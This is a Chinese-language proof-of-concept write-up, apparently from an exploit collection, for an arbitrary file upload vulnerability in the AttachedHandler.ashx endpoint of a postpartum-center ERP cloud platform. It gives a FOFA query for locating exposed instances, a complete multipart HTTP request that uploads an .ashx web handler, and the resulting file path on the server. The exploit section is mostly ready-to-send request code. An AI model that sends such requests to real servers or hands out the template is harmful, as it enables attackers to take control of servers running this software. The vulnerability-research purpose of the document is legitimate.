POC/wpoc/月子会所ERP/月子会所ERP管理云平台AttachedHandler任意文件上传漏洞.md

63 lines
2.3 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# 月子会所ERP管理云平台AttachedHandler任意文件上传漏洞
# <font style="color:#080808;background-color:#ffffff;">一、漏洞简介</font>
<font style="color:#080808;background-color:#ffffff;">月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤可上传任意文件攻击者可利用该漏洞获取服务器控制权。</font>
# <font style="color:#080808;background-color:#ffffff;">二、影响版本</font>
+ <font style="color:#080808;background-color:#ffffff;">月子会所ERP管理云平台</font>
# <font style="color:#080808;background-color:#ffffff;">三、资产测绘</font>
+ fofa`product="妈妈宝盒-ERP"`
+ 登录页面
![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/hYn-RmHIzVg3kc36/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-441408.png)
# <font style="color:#080808;background-color:#ffffff;">四、漏洞复现</font>
```plain
POST /Page/upload/AttachedHandler.ashx?url=/UploadBaseFolder/ERP&Type=0 HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_301
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 499
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="1.ashx"
<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{
get {
return true;
}
}
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("hello");
}
}
--00content0boundary00--
```
![1695626272210-db5e34de-52ef-4914-a4b9-141d8b167264.png](./img/hYn-RmHIzVg3kc36/1695626272210-db5e34de-52ef-4914-a4b9-141d8b167264-969455.png)
上传文件位置
```plain
/UploadBaseFolder/ERP/202309250717237350958.ashx
```
![1695626315758-1f89a288-7347-458a-bddf-cdb833aca48e.png](./img/hYn-RmHIzVg3kc36/1695626315758-1f89a288-7347-458a-bddf-cdb833aca48e-425656.png)
> 更新: 2024-02-29 23:55:51
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/so2ar5mrlgo5bw85>